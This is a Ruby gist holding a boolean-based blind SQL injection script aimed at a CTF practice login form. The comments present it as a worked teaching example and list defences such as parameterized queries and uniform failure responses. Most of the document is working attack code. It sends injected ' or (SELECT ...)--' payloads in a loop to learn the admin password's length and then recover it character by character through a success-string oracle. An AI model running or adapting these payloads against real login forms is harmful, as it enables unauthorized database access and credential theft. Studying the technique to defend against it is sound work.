Created
June 11, 2015 16:16
# Boolean-based blind SQL injection proof-of-concept against a CTF login form.
# Worth reading as a worked example of why string-built SQL is dangerous: the
# server answers each request with one bit of information (whether the page
# body contains "Congratulations!"), and that single bit is enough to recover
# a stored secret one question at a time.
#
# Defensive takeaways: bind user input with parameterized queries so it can
# never change the query's structure; return an identical response body for
# every failed login so there is no yes/no oracle; and alert on bursts of
# near-identical POSTs whose form fields contain SQL syntax (quotes, SELECT,
# comment markers) — this script issues hundreds of them in a tight loop.
require "uri"
require "net/http"

# Target from the original gist: a CTF practice host, not a production system.
url = URI.parse("http://ctfq.sweetduet.info:10080/~q6/")

puts "Step1: Surveying password length..."
# Each POST asks one yes/no question ("is the length <= i?") and reads the
# answer from the page text. The upper bound of 100 stops the loop even if the
# target never answers yes.
# NOTE(review): when no i in 1..100 matches, `len` is never assigned and stays
# nil; `1..nil` in the Step 2 `for` is an endless range on Ruby >= 2.6 (and an
# error on older rubies), so the gist does not handle the not-found case.
for i in 1..100 do
  response = Net::HTTP.post_form(url, "id" => %(' or (SELECT length(pass) FROM user WHERE id='admin') <= #{i}--))
  if response.body.include?(%(Congratulations!))
    len = i
    break
  end
end
puts %(Complete. password length is #{len}.)

puts "Step2: Surveying password..."
# One character position per outer iteration, one printable-ASCII candidate
# (33..126) per request. The only signal used is again the success string in
# the body — an application that answered every failed login identically
# would leak nothing here. A position with no matching candidate prints
# nothing and is silently skipped.
for i in 1..len do
  (33..126).each do |c|
    response = Net::HTTP.post_form(url, "id" => %(' or substr((SELECT pass FROM user WHERE id='admin'), #{i}, 1)="#{c.chr}"--"))
    if response.body.include?(%(Congratulations!))
      print c.chr
      break
    end
  end
end
puts "\nComplete."